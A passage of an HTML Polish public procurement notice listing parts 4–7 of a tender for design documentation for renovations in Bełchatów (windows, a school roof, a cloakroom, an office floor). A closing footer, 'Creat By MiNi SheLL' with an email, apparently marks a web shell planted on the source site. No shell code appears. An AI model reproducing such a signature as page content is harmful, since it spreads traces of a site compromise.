<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie dokumentacji służącej do opisu przedmiotu zamówienia na roboty
budowlane: rysunków, opisów technicznych, przedmiarów, kosztorysów oraz
specyfikacji technicznych wykonania i odbioru robót budowlanych na:
Zadanie 4. Wymiana okien w budynku Domu Pomocy Społecznej w Bełchatowie,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do projektanta będzie należało opracowanie dokumentacji na wymianę 101 szt. stolarki
okiennej drewnianej na PCV wraz z wymianą parapetów zewnętrznych oraz zabudową 5 szt.
otworów luksferami w budynku Domu Pomocy Społecznej przy ul. Dąbrowskiego 2
w Bełchatowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opracowanie dokumentacji służącej do opisu przedmiotu zamówienia na roboty
budowlane: rysunków, opisów technicznych, przedmiarów, kosztorysów oraz
specyfikacji technicznych wykonania i odbioru robót budowlanych na:
Zadanie 5. Remont dachu nad częścią sportową i wejściem głównym w Zespole Szkół
Ponadgimnazjalnych Nr 3 w Bełchatowie,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do projektanta będzie należało opracowanie dokumentacji na remont dachu (wymiana
pokrycia bądź smarowanie dachu) wraz z koniecznymi uzupełnieniami obróbek blacharskich
oraz naprawę instalacji odgromowej w budynku ZSP nr 3 przy ul. Czaplinieckiej 96
w Bełchatowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Opracowanie dokumentacji służącej do opisu przedmiotu zamówienia na roboty
budowlane: rysunków, opisów technicznych, przedmiarów, kosztorysów oraz
specyfikacji technicznych wykonania i odbioru robót budowlanych na: Zadanie 6.Remont pomieszczeń piwnic - szatni w II Liceum Ogólnokształcącym
w Bełchatowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do projektanta będzie należało opracowanie dokumentacji na remont szatni w budynku II
LO przy ul. Czaplinieckiej 72 w Bełchatowie. Remont obejmuje: rozbiórkę boksów,
malowanie, nałożenie tynku ozdobnego oraz płytek ściennych w pomieszczeniu szatni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Opracowanie dokumentacji służącej do opisu przedmiotu zamówienia na roboty
budowlane: rysunków, opisów technicznych, przedmiarów, kosztorysów oraz
specyfikacji technicznych wykonania i odbioru robót budowlanych na: Zadanie 7.Remont pomieszczenia w budynku Starostwa Powiatowego przy
ul. Pabianickiej 34 w Bełchatowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do projektanta będzie należało opracowanie dokumentacji, która powinna zawierać
wymianę podłogi w jednym pomieszczeniu o wymiarach ok.4,40 x 4,60 m, zbudowanie
nowej posadzki oraz malowanie pomieszczenia w budynku Starostwa Powiatowego przy
ul. Pabianickiej 34 w Bełchatowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com